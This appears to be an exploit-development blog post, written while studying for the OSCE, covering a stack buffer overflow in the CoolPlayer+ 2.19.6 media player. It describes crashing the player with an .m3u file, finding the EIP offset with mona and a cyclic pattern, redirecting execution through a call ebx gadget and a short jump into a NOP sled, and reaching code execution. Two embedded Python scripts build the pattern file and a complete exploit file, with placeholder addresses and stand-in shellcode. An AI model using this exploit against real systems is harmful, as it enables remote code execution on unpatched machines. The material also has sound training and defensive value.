While preparing for the OSCE I found an exploit for CoolPlayer+ version 2.19.1 from 2009.
I decided to check whether the vulnerability still exists in the current version (2.19.6) on my Windows 10 machine. The following post describes the exploit development.

1. create PoC

I created a small Python script that writes a .m3u file containing 5000 “A” characters.

After attaching the program to a debugger and loading the file into CoolPlayer, it crashed. EIP and several other registers were overwritten with my characters, so the vulnerability still exists.

2. determine the offsets

For the next step I created a pattern via

pattern_create -l 5000

replaced the “A” characters with it, and checked the offsets in Immunity Debugger with mona via

!mona findmsp

To verify the offset, I changed the exploit script so that the four bytes at the reported offset are “B” and reloaded the new file into CoolPlayer.

EIP is now overwritten with my “B”s, i.e. \x42\x42\x42\x42 in hex.
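The offset lookup this step relies on, as an added example written for this post (it is not the author's script and not Metasploit's code): a self-contained Python reimplementation of the pattern_create / pattern_offset logic. The file name pattern.m3u and the sample EIP value 0x41316141 are assumptions for illustration; with the value the debugger actually shows after the crash, pattern_offset returns the offset at which the four “B”s must be placed.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the pattern_create style: 'Aa0Aa1Aa2...'.

    Every 3-byte triple is unique for the first 20280 bytes, so any
    4-byte window identifies its own position in the buffer.
    """
    out = bytearray()
    for a in UPPER:
        for b in LOWER:
            for c in DIGITS:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the maximum unique pattern size")


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset into `pattern` of the 4 bytes that ended up in EIP.

    `eip` is the register value as the debugger displays it (e.g. 0x41316141).
    The bytes were loaded little-endian, so pack the value back into memory
    order before searching. Returns -1 if the value is not from the pattern.
    """
    needle = struct.pack("<I", eip)
    return pattern.find(needle)


def write_poc(path: str, data: bytes) -> None:
    # binary mode: no newline translation, so file offsets equal buffer offsets
    with open(path, "wb") as f:
        f.write(data)


if __name__ == "__main__":
    pat = pattern_create(5000)
    write_poc("pattern.m3u", pat)  # assumed file name
    # After the crash, read EIP from the debugger and look it up.
    # 0x41316141 is a constructed sample value, the bytes "Aa1A" at offset 3.
    print("EIP offset:", pattern_offset(pat, 0x41316141))
```

This is the same check `!mona findmsp` performs from inside the debugger; doing it in the script is useful when the crash happens on a machine without mona, and the -1 return catches the case where EIP holds something other than pattern bytes (a partial overwrite or an unrelated crash).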

3. looking for jumps into my code cave

I examined the registers and noticed that EBX pointed into my buffer, which makes it a perfect register to jump through. Using mona I found a suitable address via

!mona jmp -r ebx

I converted the address to little-endian byte order (reversed hex) and replaced my four “B”s with it.

I loaded my new “malicious” file with a breakpoint on the call ebx instruction, which confirmed that it leads into my buffer of capital “A”s.

4. checking the possible space

Now I checked how much space is available for my shellcode at EBX.

Just 240 bytes, which is too small for a payload such as a reverse shell. I noticed that my buffer of capital “C”s lies right after some instruction at the end of my first buffer, so I decided to place a short jmp at the end of the first buffer that lands in the “C” buffer.

5. final exploit

Finally I used a NOP sled in the “C” buffer and placed my shellcode there (starting with \xd9\xeb\x9b\xd9\x74\x24, the fldpi / fnstenv GetPC stub used by Metasploit's x86 encoders).

And code execution!

You can find the final exploit here.
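An added example of the finished file layout, written for this post and not the author's exploit linked above. It assumes the arrangement the post describes: EBX points at the 240 usable bytes immediately before the return address, the four return-address bytes sit between that buffer and the “C” buffer, and a jmp short at the end of the first buffer steps over them into a NOP sled. EIP_OFFSET, CALL_EBX, the file name and the int3 stand-in shellcode are placeholders to be replaced with the values mona reported and real msfvenom output; the bad-byte list is an assumption, since the post does not list any.

```python
import struct

# --- Layout parameters: placeholders, not values from the original post ---
TOTAL_LEN = 5000          # same file size as the crash PoC
EIP_OFFSET = 260          # placeholder: the offset !mona findmsp reported
CALL_EBX = 0xDEADBEEF     # placeholder: the call ebx address from !mona jmp -r ebx
EBX_SPACE = 240           # usable bytes at EBX, as measured in the debugger
# int3 stand-in for shellcode: the debugger breaks here if execution lands.
# Replace with msfvenom output (the post's payload starts \xd9\xeb\x9b\xd9\x74\x24).
SHELLCODE = b"\xcc" * 4
# Assumption: bytes a line-oriented playlist parser would truncate or mangle.
BAD_BYTES = b"\x00\x0a\x0d"


def jmp_short(displacement: int) -> bytes:
    """Encode `jmp short rel8` (EB xx).

    rel8 is relative to the end of the 2-byte instruction, so a displacement
    of N skips exactly the next N bytes; -2 would loop on itself.
    """
    if not -128 <= displacement <= 127:
        raise ValueError("short jump displacement out of range")
    return b"\xeb" + struct.pack("<b", displacement)


def find_bad_bytes(data: bytes, bad: bytes = BAD_BYTES) -> list:
    """Offsets of every byte in `data` that appears in `bad`."""
    return [i for i, b in enumerate(data) if b in bad]


def build_exploit() -> bytes:
    # 1. saved return address -> call ebx, packed little-endian
    ret = struct.pack("<I", CALL_EBX)
    # 2. the short jump sits in the last 2 bytes before the return address
    #    and steps over the 4 address bytes into the second buffer
    jmp = jmp_short(len(ret))
    # 3. filler before EBX, then the 240-byte buffer EBX points at
    stage1 = b"A" * (EIP_OFFSET - EBX_SPACE)
    stage1 += b"\x90" * (EBX_SPACE - len(jmp)) + jmp
    assert len(stage1) == EIP_OFFSET
    # 4. landing zone: NOP sled, then the payload
    stage2 = b"\x90" * 16 + SHELLCODE
    payload = stage1 + ret + stage2
    if len(payload) > TOTAL_LEN:
        raise ValueError("payload does not fit in the original file length")
    # 5. pad with "C" to the original crash length
    return payload + b"C" * (TOTAL_LEN - len(payload))


if __name__ == "__main__":
    exploit = build_exploit()
    bad = find_bad_bytes(exploit)
    if bad:
        raise SystemExit(f"bad bytes at offsets {bad}, re-encode the payload")
    with open("exploit.m3u", "wb") as f:  # assumed file name
        f.write(exploit)
```

Run it once with the int3 stand-in: if the debugger breaks on 0xCC inside the “C” region, the call ebx, the jmp short and the sled all chain correctly, and only then is it worth swapping in the real payload. The bad-byte scan is the check that would otherwise show up as a truncated buffer and a mysteriously different crash.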